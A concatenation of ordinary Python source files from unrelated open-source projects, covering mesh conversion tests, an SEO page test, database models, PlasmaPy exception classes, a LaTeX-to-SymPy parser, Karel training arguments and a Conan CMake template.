h = np.ones(16)
mesh = discretize.TensorMesh([h, 2 * h, 3 * h])
self.mesh = mesh
def test_to_omf(self):
mesh = self.mesh
vec = np.arange(mesh.nC)
models = {"arange": vec}
omf_element = mesh.to_omf(models)
geom = omf_element.geometry
# Check geometry
self.assertEqual(mesh.nC, geom.num_cells)
self.assertEqual(mesh.nN, geom.num_nodes)
self.assertTrue(np.allclose(mesh.hx, geom.tensor_u))
self.assertTrue(np.allclose(mesh.hy, geom.tensor_v))
self.assertTrue(np.allclose(mesh.hz, geom.tensor_w))
self.assertTrue(np.allclose(mesh.axis_u, geom.axis_u))
self.assertTrue(np.allclose(mesh.axis_v, geom.axis_v))
self.assertTrue(np.allclose(mesh.axis_w, geom.axis_w))
self.assertTrue(np.allclose(mesh.x0, geom.origin))
# Check data arrays
self.assertEqual(len(models.keys()), len(omf_element.data))
for i in range(len(omf_element.data)):
name = list(models.keys())[i]
scalar_data = omf_element.data[i]
self.assertEqual(name, scalar_data.name)
arr = unravel_data_array(
np.array(scalar_data.array), mesh.nCx, mesh.nCy, mesh.nCz
)
self.assertTrue(np.allclose(models[name], arr))
def test_from_omf(self):
omf_element = omf.VolumeElement(
name="vol_ir",
geometry=omf.VolumeGridGeometry(
axis_u=[1, 1, 0],
axis_v=[0, 0, 1],
axis_w=[1, -1, 0],
tensor_u=np.ones(10).astype(float),
tensor_v=np.ones(15).astype(float),
tensor_w=np.ones(20).astype(float),
origin=[10.0, 10.0, -10],
),
data=[
omf.ScalarData(
name="Random Data",
location="cells",
array=np.random.rand(10, 15, 20).flatten(),
)
],
)
# Make a discretize mesh
mesh, models = discretize.TensorMesh.from_omf(omf_element)
geom = omf_element.geometry
# Check geometry
self.assertEqual(mesh.nC, geom.num_cells)
self.assertEqual(mesh.nN, geom.num_nodes)
self.assertTrue(np.allclose(mesh.hx, geom.tensor_u))
self.assertTrue(np.allclose(mesh.hy, geom.tensor_v))
self.assertTrue(np.allclose(mesh.hz, geom.tensor_w))
self.assertTrue(np.allclose(mesh.axis_u, geom.axis_u))
self.assertTrue(np.allclose(mesh.axis_v, geom.axis_v))
self.assertTrue(np.allclose(mesh.axis_w, geom.axis_w))
self.assertTrue(np.allclose(mesh.x0, geom.origin))
# Check data arrays
self.assertEqual(len(models.keys()), len(omf_element.data))
for i in range(len(omf_element.data)):
name = list(models.keys())[i]
scalar_data = omf_element.data[i]
self.assertEqual(name, scalar_data.name)
arr = ravel_data_array(
models[name],
len(geom.tensor_u),
len(geom.tensor_v),
len(geom.tensor_w),
)
self.assertTrue(np.allclose(np.array(scalar_data.array), arr))
if __name__ == "__main__":
unittest.main()
|
tests/test_page.py | cobolbaby/python-seo-analyzer | 743 | 11195293 | <gh_stars>100-1000
from seoanalyzer import page
def test_page_init():
p = page.Page(url='https://www.sethserver.com/sitemap.xml', base_domain='https://www.sethserver.com/')
assert p.base_domain.scheme == 'https'
assert p.base_domain.netloc == 'www.sethserver.com'
assert p.base_domain.path == '/'
assert p.url == 'https://www.sethserver.com/sitemap.xml'
assert p.title == ''
assert p.description == ''
assert p.keywords == {}
assert p.warnings == []
assert p.links == []
def test_analyze():
p = page.Page(url='https://www.sethserver.com/', base_domain='https://www.sethserver.com/')
assert p.analyze()
|
mlcomp/db/models/computer.py | megachester/mlcomp | 166 | 11195316 | <filename>mlcomp/db/models/computer.py
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from mlcomp.db.models.base import Base
from mlcomp.utils.misc import now
class Computer(Base):
__tablename__ = 'computer'
name = sa.Column(sa.String, primary_key=True)
gpu = sa.Column(sa.Integer, default=0)
cpu = sa.Column(sa.Integer, default=1)
memory = sa.Column(sa.Float, default=0.1)
usage = sa.Column(sa.String)
ip = sa.Column(sa.String)
port = sa.Column(sa.Integer)
user = sa.Column(sa.String)
last_synced = sa.Column(sa.DateTime)
disk = sa.Column(sa.Integer)
syncing_computer = sa.Column(sa.String, ForeignKey('computer.name'))
root_folder = sa.Column(sa.String)
can_process_tasks = sa.Column(sa.Boolean)
sync_with_this_computer = sa.Column(sa.Boolean)
meta = sa.Column(sa.String)
class ComputerUsage(Base):
__tablename__ = 'computer_usage'
id = sa.Column(sa.Integer, primary_key=True)
computer = sa.Column(sa.String, ForeignKey('computer.name'))
usage = sa.Column(sa.String)
time = sa.Column(sa.DateTime, default=now())
__all__ = ['Computer', 'ComputerUsage']
|
plasmapy/utils/exceptions.py | seanjunheng2/PlasmaPy | 429 | 11195334 | """Exceptions and warnings specific to PlasmaPy."""
__all__ = [
"PlasmaPyError",
"PhysicsError",
"InvalidRomanNumeralError",
"OutOfRangeError",
"RelativityError",
"RomanError",
"PlasmaPyWarning",
"CouplingWarning",
"PhysicsWarning",
"PlasmaPyDeprecationWarning",
"PlasmaPyFutureWarning",
"RelativityWarning",
]
# ------------------------------------------------------------------------------
# Exceptions
# ------------------------------------------------------------------------------
class PlasmaPyError(Exception):
"""
Base class of PlasmaPy custom errors.
All custom exceptions raised by PlasmaPy should inherit from this
class and be defined in this module.
"""
pass
class PhysicsError(PlasmaPyError, ValueError):
"""
The base exception for physics-related errors.
"""
pass
class RomanError(PlasmaPyError):
"""A base exception for errors from `plasmapy.utils.roman`."""
pass
# ^^^^^^^^^^^^ Base Exceptions should be defined above this comment ^^^^^^^^^^^^
class RelativityError(PhysicsError):
"""
An exception for speeds greater than the speed of light.
"""
pass
class OutOfRangeError(RomanError):
"""
An exception to be raised for integers that outside of the range
that can be converted to Roman numerals.
"""
pass
class InvalidRomanNumeralError(RomanError):
"""
An exception to be raised when the input is not a valid Roman
numeral.
"""
pass
# ------------------------------------------------------------------------------
# Warnings
# ------------------------------------------------------------------------------
class PlasmaPyWarning(Warning):
"""
Base class of PlasmaPy custom warnings.
All PlasmaPy custom warnings should inherit from this class and be
defined in this module.
Warnings should be issued using `warnings.warn`, which will not break
execution if unhandled.
"""
pass
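# A minimal illustration of issuing such a warning (the message text is a made-up example):
#
#     import warnings
#     warnings.warn("this result assumes a weakly coupled plasma", PlasmaPyWarning)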
class PhysicsWarning(PlasmaPyWarning):
"""The base warning for warnings related to non-physical situations."""
pass
# ^^^^^^^^^^^^^ Base Warnings should be defined above this comment ^^^^^^^^^^^^^
class RelativityWarning(PhysicsWarning):
"""
A warning for when relativistic velocities are being used in or are
returned by non-relativistic functionality.
"""
pass
class CouplingWarning(PhysicsWarning):
"""
A warning for functions that rely on a particular coupling regime to
be valid.
"""
pass
class PlasmaPyDeprecationWarning(PlasmaPyWarning, DeprecationWarning):
"""
A warning for deprecated features when the warning is intended for
other Python developers.
"""
pass
class PlasmaPyFutureWarning(PlasmaPyWarning, FutureWarning):
"""
A warning for deprecated features when the warning is intended for
end users of PlasmaPy.
"""
pass
|
process_latex.py | PhysicsTeacher13/latex-to-sym-py | 339 | 11195358 | <reponame>PhysicsTeacher13/latex-to-sym-py<gh_stars>100-1000
import sympy
import antlr4
from antlr4.error.ErrorListener import ErrorListener
from gen.PSParser import PSParser
from gen.PSLexer import PSLexer
from gen.PSListener import PSListener
from sympy.printing.str import StrPrinter
def process_sympy(latex_str):
    # latex_str: the LaTeX source string to be parsed into a sympy expression
    matherror = MathErrorListener(latex_str)
    stream = antlr4.InputStream(latex_str)
lex = PSLexer(stream)
lex.removeErrorListeners()
lex.addErrorListener(matherror)
tokens = antlr4.CommonTokenStream(lex)
parser = PSParser(tokens)
# remove default console error listener
parser.removeErrorListeners()
parser.addErrorListener(matherror)
relation = parser.math().relation()
expr = convert_relation(relation)
return expr
class MathErrorListener(ErrorListener):
def __init__(self, src):
        super(MathErrorListener, self).__init__()
self.src = src
def syntaxError(self, recog, symbol, line, col, msg, e):
fmt = "%s\n%s\n%s"
marker = "~" * col + "^"
if msg.startswith("missing"):
err = fmt % (msg, self.src, marker)
elif msg.startswith("no viable"):
err = fmt % ("I expected something else here", self.src, marker)
elif msg.startswith("mismatched"):
names = PSParser.literalNames
expected = [names[i] for i in e.getExpectedTokens() if i < len(names)]
            if len(expected) < 10:
expected = " ".join(expected)
err = (fmt % ("I expected one of these: " + expected,
self.src, marker))
else:
err = (fmt % ("I expected something else here", self.src, marker))
else:
err = fmt % ("I don't understand this", self.src, marker)
raise Exception(err)
def convert_relation(rel):
if rel.expr():
return convert_expr(rel.expr())
lh = convert_relation(rel.relation(0))
rh = convert_relation(rel.relation(1))
if rel.LT():
return sympy.StrictLessThan(lh, rh)
elif rel.LTE():
return sympy.LessThan(lh, rh)
elif rel.GT():
return sympy.StrictGreaterThan(lh, rh)
elif rel.GTE():
return sympy.GreaterThan(lh, rh)
elif rel.EQUAL():
return sympy.Eq(lh, rh)
def convert_expr(expr):
return convert_add(expr.additive())
def convert_add(add):
if add.ADD():
lh = convert_add(add.additive(0))
rh = convert_add(add.additive(1))
return sympy.Add(lh, rh, evaluate=False)
elif add.SUB():
lh = convert_add(add.additive(0))
rh = convert_add(add.additive(1))
return sympy.Add(lh, -1 * rh, evaluate=False)
else:
return convert_mp(add.mp())
def convert_mp(mp):
if hasattr(mp, 'mp'):
mp_left = mp.mp(0)
mp_right = mp.mp(1)
else:
mp_left = mp.mp_nofunc(0)
mp_right = mp.mp_nofunc(1)
if mp.MUL() or mp.CMD_TIMES() or mp.CMD_CDOT():
lh = convert_mp(mp_left)
rh = convert_mp(mp_right)
return sympy.Mul(lh, rh, evaluate=False)
elif mp.DIV() or mp.CMD_DIV() or mp.COLON():
lh = convert_mp(mp_left)
rh = convert_mp(mp_right)
return sympy.Mul(lh, sympy.Pow(rh, -1, evaluate=False), evaluate=False)
else:
if hasattr(mp, 'unary'):
return convert_unary(mp.unary())
else:
return convert_unary(mp.unary_nofunc())
def convert_unary(unary):
if hasattr(unary, 'unary'):
nested_unary = unary.unary()
else:
nested_unary = unary.unary_nofunc()
if hasattr(unary, 'postfix_nofunc'):
first = unary.postfix()
tail = unary.postfix_nofunc()
postfix = [first] + tail
else:
postfix = unary.postfix()
if unary.ADD():
return convert_unary(nested_unary)
elif unary.SUB():
return sympy.Mul(-1, convert_unary(nested_unary), evaluate=False)
elif postfix:
return convert_postfix_list(postfix)
def convert_postfix_list(arr, i=0):
if i >= len(arr):
raise Exception("Index out of bounds")
res = convert_postfix(arr[i])
if isinstance(res, sympy.Expr):
if i == len(arr) - 1:
return res # nothing to multiply by
else:
if i > 0:
left = convert_postfix(arr[i - 1])
right = convert_postfix(arr[i + 1])
if isinstance(left, sympy.Expr) and isinstance(right, sympy.Expr):
left_syms = convert_postfix(arr[i - 1]).atoms(sympy.Symbol)
right_syms = convert_postfix(arr[i + 1]).atoms(sympy.Symbol)
# if the left and right sides contain no variables and the
# symbol in between is 'x', treat as multiplication.
if len(left_syms) == 0 and len(right_syms) == 0 and str(res) == "x":
return convert_postfix_list(arr, i + 1)
# multiply by next
return sympy.Mul(res, convert_postfix_list(arr, i + 1), evaluate=False)
else: # must be derivative
wrt = res[0]
if i == len(arr) - 1:
raise Exception("Expected expression for derivative")
else:
expr = convert_postfix_list(arr, i + 1)
return sympy.Derivative(expr, wrt)
def do_subs(expr, at):
if at.expr():
at_expr = convert_expr(at.expr())
syms = at_expr.atoms(sympy.Symbol)
if len(syms) == 0:
return expr
elif len(syms) > 0:
sym = next(iter(syms))
return expr.subs(sym, at_expr)
elif at.equality():
lh = convert_expr(at.equality().expr(0))
rh = convert_expr(at.equality().expr(1))
return expr.subs(lh, rh)
def convert_postfix(postfix):
if hasattr(postfix, 'exp'):
exp_nested = postfix.exp()
else:
exp_nested = postfix.exp_nofunc()
exp = convert_exp(exp_nested)
for op in postfix.postfix_op():
if op.BANG():
if isinstance(exp, list):
raise Exception("Cannot apply postfix to derivative")
exp = sympy.factorial(exp, evaluate=False)
elif op.eval_at():
ev = op.eval_at()
at_b = None
at_a = None
if ev.eval_at_sup():
at_b = do_subs(exp, ev.eval_at_sup())
if ev.eval_at_sub():
at_a = do_subs(exp, ev.eval_at_sub())
if at_b != None and at_a != None:
exp = sympy.Add(at_b, -1 * at_a, evaluate=False)
elif at_b != None:
exp = at_b
elif at_a != None:
exp = at_a
return exp
def convert_exp(exp):
if hasattr(exp, 'exp'):
exp_nested = exp.exp()
else:
exp_nested = exp.exp_nofunc()
if exp_nested:
base = convert_exp(exp_nested)
if isinstance(base, list):
raise Exception("Cannot raise derivative to power")
if exp.atom():
exponent = convert_atom(exp.atom())
elif exp.expr():
exponent = convert_expr(exp.expr())
return sympy.Pow(base, exponent, evaluate=False)
else:
if hasattr(exp, 'comp'):
return convert_comp(exp.comp())
else:
return convert_comp(exp.comp_nofunc())
def convert_comp(comp):
if comp.group():
return convert_expr(comp.group().expr())
elif comp.abs_group():
return sympy.Abs(convert_expr(comp.abs_group().expr()), evaluate=False)
elif comp.atom():
return convert_atom(comp.atom())
elif comp.frac():
return convert_frac(comp.frac())
elif comp.func():
return convert_func(comp.func())
def convert_atom(atom):
if atom.LETTER():
subscriptName = ''
if atom.subexpr():
subscript = None
if atom.subexpr().expr(): # subscript is expr
subscript = convert_expr(atom.subexpr().expr())
else: # subscript is atom
subscript = convert_atom(atom.subexpr().atom())
subscriptName = '_{' + StrPrinter().doprint(subscript) + '}'
return sympy.Symbol(atom.LETTER().getText() + subscriptName)
elif atom.SYMBOL():
s = atom.SYMBOL().getText()[1:]
if s == "infty":
return sympy.oo
else:
if atom.subexpr():
subscript = None
if atom.subexpr().expr(): # subscript is expr
subscript = convert_expr(atom.subexpr().expr())
else: # subscript is atom
subscript = convert_atom(atom.subexpr().atom())
subscriptName = StrPrinter().doprint(subscript)
s += '_{' + subscriptName + '}'
return sympy.Symbol(s)
elif atom.NUMBER():
s = atom.NUMBER().getText().replace(",", "")
return sympy.Number(s)
elif atom.DIFFERENTIAL():
var = get_differential_var(atom.DIFFERENTIAL())
return sympy.Symbol('d' + var.name)
elif atom.mathit():
text = rule2text(atom.mathit().mathit_text())
return sympy.Symbol(text)
def rule2text(ctx):
stream = ctx.start.getInputStream()
# starting index of starting token
startIdx = ctx.start.start
# stopping index of stopping token
stopIdx = ctx.stop.stop
return stream.getText(startIdx, stopIdx)
def convert_frac(frac):
diff_op = False
partial_op = False
lower_itv = frac.lower.getSourceInterval()
lower_itv_len = lower_itv[1] - lower_itv[0] + 1
if (frac.lower.start == frac.lower.stop and
frac.lower.start.type == PSLexer.DIFFERENTIAL):
wrt = get_differential_var_str(frac.lower.start.text)
diff_op = True
elif (lower_itv_len == 2 and
frac.lower.start.type == PSLexer.SYMBOL and
frac.lower.start.text == '\\partial' and
(frac.lower.stop.type == PSLexer.LETTER or frac.lower.stop.type == PSLexer.SYMBOL)):
partial_op = True
wrt = frac.lower.stop.text
if frac.lower.stop.type == PSLexer.SYMBOL:
wrt = wrt[1:]
if diff_op or partial_op:
wrt = sympy.Symbol(wrt)
if (diff_op and frac.upper.start == frac.upper.stop and
frac.upper.start.type == PSLexer.LETTER and
frac.upper.start.text == 'd'):
return [wrt]
elif (partial_op and frac.upper.start == frac.upper.stop and
frac.upper.start.type == PSLexer.SYMBOL and
frac.upper.start.text == '\\partial'):
return [wrt]
upper_text = rule2text(frac.upper)
expr_top = None
if diff_op and upper_text.startswith('d'):
expr_top = process_sympy(upper_text[1:])
elif partial_op and frac.upper.start.text == '\\partial':
expr_top = process_sympy(upper_text[len('\\partial'):])
if expr_top:
return sympy.Derivative(expr_top, wrt)
expr_top = convert_expr(frac.upper)
expr_bot = convert_expr(frac.lower)
return sympy.Mul(expr_top, sympy.Pow(expr_bot, -1, evaluate=False), evaluate=False)
def convert_func(func):
if func.func_normal():
if func.L_PAREN(): # function called with parenthesis
arg = convert_func_arg(func.func_arg())
else:
arg = convert_func_arg(func.func_arg_noparens())
name = func.func_normal().start.text[1:]
# change arc<trig> -> a<trig>
if name in ["arcsin", "arccos", "arctan", "arccsc", "arcsec",
"arccot"]:
name = "a" + name[3:]
expr = getattr(sympy.functions, name)(arg, evaluate=False)
if name in ["arsinh", "arcosh", "artanh"]:
name = "a" + name[2:]
expr = getattr(sympy.functions, name)(arg, evaluate=False)
if (name=="log" or name=="ln"):
if func.subexpr():
base = convert_expr(func.subexpr().expr())
elif name == "log":
base = 10
elif name == "ln":
base = sympy.E
expr = sympy.log(arg, base, evaluate=False)
func_pow = None
should_pow = True
if func.supexpr():
if func.supexpr().expr():
func_pow = convert_expr(func.supexpr().expr())
else:
func_pow = convert_atom(func.supexpr().atom())
if name in ["sin", "cos", "tan", "csc", "sec", "cot", "sinh", "cosh", "tanh"]:
if func_pow == -1:
name = "a" + name
should_pow = False
expr = getattr(sympy.functions, name)(arg, evaluate=False)
if func_pow and should_pow:
expr = sympy.Pow(expr, func_pow, evaluate=False)
return expr
elif func.LETTER() or func.SYMBOL():
if func.LETTER():
fname = func.LETTER().getText()
elif func.SYMBOL():
fname = func.SYMBOL().getText()[1:]
fname = str(fname) # can't be unicode
if func.subexpr():
subscript = None
if func.subexpr().expr(): # subscript is expr
subscript = convert_expr(func.subexpr().expr())
else: # subscript is atom
subscript = convert_atom(func.subexpr().atom())
subscriptName = StrPrinter().doprint(subscript)
fname += '_{' + subscriptName + '}'
input_args = func.args()
output_args = []
while input_args.args(): # handle multiple arguments to function
output_args.append(convert_expr(input_args.expr()))
input_args = input_args.args()
output_args.append(convert_expr(input_args.expr()))
return sympy.Function(fname)(*output_args)
elif func.FUNC_INT():
return handle_integral(func)
elif func.FUNC_SQRT():
expr = convert_expr(func.base)
if func.root:
r = convert_expr(func.root)
return sympy.root(expr, r)
else:
return sympy.sqrt(expr)
elif func.FUNC_SUM():
return handle_sum_or_prod(func, "summation")
elif func.FUNC_PROD():
return handle_sum_or_prod(func, "product")
elif func.FUNC_LIM():
return handle_limit(func)
def convert_func_arg(arg):
if hasattr(arg, 'expr'):
return convert_expr(arg.expr())
else:
return convert_mp(arg.mp_nofunc())
def handle_integral(func):
if func.additive():
integrand = convert_add(func.additive())
elif func.frac():
integrand = convert_frac(func.frac())
else:
integrand = 1
int_var = None
if func.DIFFERENTIAL():
int_var = get_differential_var(func.DIFFERENTIAL())
else:
for sym in integrand.atoms(sympy.Symbol):
s = str(sym)
if len(s) > 1 and s[0] == 'd':
if s[1] == '\\':
int_var = sympy.Symbol(s[2:])
else:
int_var = sympy.Symbol(s[1:])
int_sym = sym
if int_var:
integrand = integrand.subs(int_sym, 1)
else:
# Assume dx by default
int_var = sympy.Symbol('x')
if func.subexpr():
if func.subexpr().atom():
lower = convert_atom(func.subexpr().atom())
else:
lower = convert_expr(func.subexpr().expr())
if func.supexpr().atom():
upper = convert_atom(func.supexpr().atom())
else:
upper = convert_expr(func.supexpr().expr())
return sympy.Integral(integrand, (int_var, lower, upper))
else:
return sympy.Integral(integrand, int_var)
def handle_sum_or_prod(func, name):
val = convert_mp(func.mp())
iter_var = convert_expr(func.subeq().equality().expr(0))
start = convert_expr(func.subeq().equality().expr(1))
if func.supexpr().expr(): # ^{expr}
end = convert_expr(func.supexpr().expr())
else: # ^atom
end = convert_atom(func.supexpr().atom())
if name == "summation":
return sympy.Sum(val, (iter_var, start, end))
elif name == "product":
return sympy.Product(val, (iter_var, start, end))
def handle_limit(func):
sub = func.limit_sub()
if sub.LETTER():
var = sympy.Symbol(sub.LETTER().getText())
elif sub.SYMBOL():
var = sympy.Symbol(sub.SYMBOL().getText()[1:])
else:
var = sympy.Symbol('x')
if sub.SUB():
direction = "-"
else:
direction = "+"
approaching = convert_expr(sub.expr())
content = convert_mp(func.mp())
return sympy.Limit(content, var, approaching, direction)
def get_differential_var(d):
text = get_differential_var_str(d.getText())
return sympy.Symbol(text)
def get_differential_var_str(text):
for i in range(1, len(text)):
c = text[i]
if not (c == " " or c == "\r" or c == "\n" or c == "\t"):
idx = i
break
text = text[idx:]
if text[0] == "\\":
text = text[1:]
return text
def test_sympy():
print process_sympy("e^{(45 + 2)}")
print process_sympy("e + 5")
print process_sympy("5 + e")
print process_sympy("e")
print process_sympy("\\frac{dx}{dy} \\int y x^2 dy")
print process_sympy("\\frac{dx}{dy} 5")
print process_sympy("\\frac{d}{dx} \\int x^2 dx")
print process_sympy("\\frac{dx}{dy} \\int x^2 dx")
print process_sympy("\\frac{d}{dy} x^2 + x y = 0")
print process_sympy("\\frac{d}{dy} x^2 + x y = 2")
print process_sympy("\\frac{d x^3}{dy}")
print process_sympy("\\frac{d x^3}{dy} + x^3")
print process_sympy("\\int^{5x}_{2} x^2 dy")
print process_sympy("\\int_{5x}^{2} x^2 dx")
print process_sympy("\\int x^2 dx")
print process_sympy("2 4 5 - 2 3 1")
if __name__ == "__main__":
test_sympy()
|
program_synthesis/karel/arguments.py | kavigupta/program_synthesis | 123 | 11195388 | <filename>program_synthesis/karel/arguments.py
import torch
import argparse
import time
def get_arg_parser(title, mode):
parser = argparse.ArgumentParser(description=title)
parser.add_argument('--no-cuda', action='store_true', default=False)
parser.add_argument('--verbose', action='store_true', default=False)
parser.add_argument('--model_type', type=str, default='seq2tree')
parser.add_argument('--model_dir', type=str, default='models/%d' % int(time.time()))
parser.add_argument('--dataset', type=str, default='wikisql')
parser.add_argument('--dataset_max_size', type=int, default=0)
parser.add_argument('--dataset_max_code_length', type=int, default=0)
parser.add_argument('--dataset_filter_code_length', type=int, default=0)
parser.add_argument('--dataset_bucket', action='store_true', default=False)
parser.add_argument('--vocab_min_freq', type=int, default=50)
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--load-sync', action='store_true')
parser.add_argument('--karel-edit-data-beam', type=int, default=5)
parser.add_argument(
'--pretrained', type=str, default='',
help='Use format "encoder:path/to/checkpoint,decoder:path/to/other/checkpoint"')
if mode == 'train':
train_group = parser.add_argument_group('train')
train_group.add_argument('--save_every_n', type=int, default=100)
train_group.add_argument('--keep_every_n', type=int, default=10000000)
train_group.add_argument('--debug_every_n', type=int, default=20)
train_group.add_argument('--eval_every_n', type=int, default=1000)
train_group.add_argument('--eval_n_steps', type=int, default=50)
train_group.add_argument('--log_interval', type=int, default=20)
train_group.add_argument('--optimizer', type=str, default='adam')
train_group.add_argument('--lr', type=float, default=.001)
train_group.add_argument('--lr_decay_steps', type=int)
train_group.add_argument('--lr_decay_rate', type=float)
train_group.add_argument('--gradient-clip', type=float)
train_group.add_argument('--n_warmup_steps', type=int, default=4000)
train_group.add_argument('--num_epochs', type=int, default=10)
train_group.add_argument('--num_units', type=int, default=100)
train_group.add_argument('--num_placeholders', type=int, default=100)
train_group.add_argument('--num-att-heads', type=int, default=8)
train_group.add_argument('--bidirectional', action='store_true', default=False)
train_group.add_argument('--read-code', dest='read_code', action='store_true', default=False)
train_group.add_argument('--read-text', dest='read_text', action='store_true', default=True)
train_group.add_argument('--skip-text', dest='read_text', action='store_false')
train_group.add_argument('--read-io', dest='read_io', action='store_true', default=False)
train_group.add_argument('--skip-io', dest='read_io', action='store_false')
train_group.add_argument('--io-count', type=int, default=3)
# REINFORCE.
train_group.add_argument('--reinforce', action='store_true', default=False)
train_group.add_argument(
'--reinforce-step', type=int, default=0,
help='Step after which start to use reinforce')
train_group.add_argument(
'--reinforce-beam-size', type=int, default=100,
            help='Size of beam to evaluate when using reinforce'
)
# Additional reporting.
train_group.add_argument('--report_per_length', action='store_true', default=False)
# REFINE.
train_group.add_argument('--refine', action='store_true', default=False)
train_group.add_argument(
'--refine-beam', type=int, default=10,
help='Beam size to use while decoding to generate candidate code for training the refinement model.')
train_group.add_argument(
'--refine-samples', type=int, default=100000,
            help='Number of refinement training samples to keep in the buffer.')
train_group.add_argument('--refine-min-items', type=int, default=128)
train_group.add_argument(
'--refine-frac', type=float, default=0.5,
help='Fraction of time we should sample refinement data for training.')
train_group.add_argument(
'--refine-warmup-steps', type=int, default=1000,
help='Number of steps we should train before we sample any code to generate the refinement dataset.')
train_group.add_argument(
'--refine-sample-frac', type=float, default=0.1,
help='Fraction of batches for which we should sample code to add to the refinement data for training.')
train_group.add_argument('--batch-create-train', type=str, default='ConstantBatch(5, 1, False)')
train_group.add_argument('--batch-create-eval', type=str, default='ConstantBatch(5, 1, False)')
train_group.add_argument('--karel-trace-enc', default='lstm')
train_group.add_argument('--karel-code-enc', default='default')
train_group.add_argument('--karel-code-update', default='default')
train_group.add_argument('--karel-code-update-steps', default=0,
type=int)
train_group.add_argument('--karel-refine-dec', default='default')
train_group.add_argument('--karel-trace-usage', default='memory')
train_group.add_argument('--karel-trace-top-k', default=1, type=int)
train_group.add_argument('--karel-code-usage', default='memory')
train_group.add_argument('--karel-io-enc', default='lgrl')
train_group.add_argument('--karel-io-conv-blocks', default=2, type=int)
train_group.add_argument('--karel-trace-action-enc', default='emb')
train_group.add_argument('--karel-trace-grid-enc', default='presnet')
train_group.add_argument('--karel-trace-cond-enc', default='concat')
train_group.add_argument('--karel-code-dec', default='latepool')
train_group.add_argument('--karel-merge-io', default='max')
train_group.add_argument('--karel-train-shuf', default=False, action='store_true')
elif mode == 'eval':
eval_group = parser.add_argument_group('eval')
eval_group.add_argument('--tag', type=str, default='')
eval_group.add_argument('--example-id', type=int, default=None)
eval_group.add_argument('--step', type=int, default=None)
eval_group.add_argument('--refine-iters', type=int, default=1)
eval_group.add_argument('--eval-train', action='store_true', default=False)
eval_group.add_argument('--hide-example-info', action='store_true', default=False)
eval_group.add_argument('--report-path')
eval_group.add_argument('--eval-final', action='store_true')
eval_group.add_argument('--infer-output')
eval_group.add_argument('--infer-limit', type=int)
eval_group.add_argument('--save-beam-outputs', action='store_true')
else:
raise ValueError(mode)
infer_group = parser.add_argument_group('infer')
infer_group.add_argument('--train-data-path', default='')
infer_group.add_argument('--eval-data-path', type=str, default='')
infer_group.add_argument('--max_decoder_length', type=int, default=100)
infer_group.add_argument('--max_beam_trees', type=int, default=100)
infer_group.add_argument('--max_beam_iter', type=int, default=1000)
infer_group.add_argument('--max_eval_trials', type=int)
infer_group.add_argument('--min_prob_threshold', type=float, default=1e-5)
infer_group.add_argument('--search-bfs', action='store_true', default=True)
infer_group.add_argument('--karel-mutate-ref', action='store_true')
infer_group.add_argument('--karel-mutate-n-dist')
infer_group.add_argument('--karel-trace-inc-val', action='store_true')
runtime_group = parser.add_argument_group('runtime')
runtime_group.add_argument(
'--restore-map-to-cpu', action='store_true', default=False)
return parser
def parse(title, mode):
parser = get_arg_parser(title, mode)
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
return args
def backport_default_args(args):
"""Backport default args."""
backport = {
"restore_map_to_cpu": False,
"keep_every_n": 10000000,
"read_text": True,
"read_io": False,
"io_count": 3,
"refine": False,
"read_code": False,
"optimizer": "adam",
"dataset_filter_code_length": 0,
"karel_trace_usage": "memory",
"karel_code_usage": "memory",
"karel_refine_dec": "default",
"karel_io_enc": "lgrl",
"karel_trace_inc_val": True,
}
for key, value in backport.items():
if not hasattr(args, key):
setattr(args, key, value)
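# Usage sketch (editorial addition, not part of the original module): a typical
# training entry point builds args with parse() and then backports defaults
# that may be missing when restoring an older checkpoint. The title string
# below is an arbitrary example.
#
#   args = parse('Train karel model', 'train')
#   backport_default_args(args)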
|
conan/tools/cmake/cmakedeps/templates/target_data.py | fanStefan/conan | 6,205 | 11195389 |
import os
import textwrap
from conan.tools.cmake.cmakedeps.templates import CMakeDepsFileTemplate
from conan.tools.cmake.utils import get_file_name
"""
foo-release-x86_64-data.cmake
"""
class ConfigDataTemplate(CMakeDepsFileTemplate):
@property
def filename(self):
data_fname = "" if not self.find_module_mode else "module-"
data_fname += "{}-{}".format(self.file_name, self.configuration.lower())
if self.arch:
data_fname += "-{}".format(self.arch)
data_fname += "-data.cmake"
return data_fname
@property
def context(self):
global_cpp = self.get_global_cpp_cmake()
if not self.build_modules_activated:
global_cpp.build_modules_paths = ""
components_cpp = self.get_required_components_cpp()
components_renames = " ".join([component_rename for component_rename, _ in
reversed(components_cpp)])
        # For the build requires we only care about the runtime requirements of the build
        # require, not the transitive ones; since the xxx-conf.cmake files won't be generated,
        # we don't include them as find_dependency.
        # This is because in the Conan 2.0 model only pure tools like CMake will be
        # build_requires; for example, a test framework won't be a build require but a
        # "test/not public" require.
dependency_filenames = self._get_dependency_filenames()
package_folder = self.conanfile.package_folder.replace('\\', '/')\
.replace('$', '\\$').replace('"', '\\"')
return {"global_cpp": global_cpp,
"pkg_name": self.pkg_name,
"package_folder": package_folder,
"config_suffix": self.config_suffix,
"components_renames": components_renames,
"components_cpp": components_cpp,
"dependency_filenames": " ".join(dependency_filenames)}
@property
def template(self):
# This will be at: XXX-release-data.cmake
ret = textwrap.dedent("""\
########### AGGREGATED COMPONENTS AND DEPENDENCIES FOR THE MULTI CONFIG #####################
#############################################################################################
set({{ pkg_name }}_COMPONENT_NAMES {{ '${'+ pkg_name }}_COMPONENT_NAMES} {{ components_renames }})
list(REMOVE_DUPLICATES {{ pkg_name }}_COMPONENT_NAMES)
set({{ pkg_name }}_FIND_DEPENDENCY_NAMES {{ '${'+ pkg_name }}_FIND_DEPENDENCY_NAMES} {{ dependency_filenames }})
list(REMOVE_DUPLICATES {{ pkg_name }}_FIND_DEPENDENCY_NAMES)
########### VARIABLES #######################################################################
#############################################################################################
set({{ pkg_name }}_PACKAGE_FOLDER{{ config_suffix }} "{{ package_folder }}")
set({{ pkg_name }}_INCLUDE_DIRS{{ config_suffix }} {{ global_cpp.include_paths }})
set({{ pkg_name }}_RES_DIRS{{ config_suffix }} {{ global_cpp.res_paths }})
set({{ pkg_name }}_DEFINITIONS{{ config_suffix }} {{ global_cpp.defines }})
set({{ pkg_name }}_SHARED_LINK_FLAGS{{ config_suffix }} {{ global_cpp.sharedlinkflags_list }})
set({{ pkg_name }}_EXE_LINK_FLAGS{{ config_suffix }} {{ global_cpp.exelinkflags_list }})
set({{ pkg_name }}_OBJECTS{{ config_suffix }} {{ global_cpp.objects_list }})
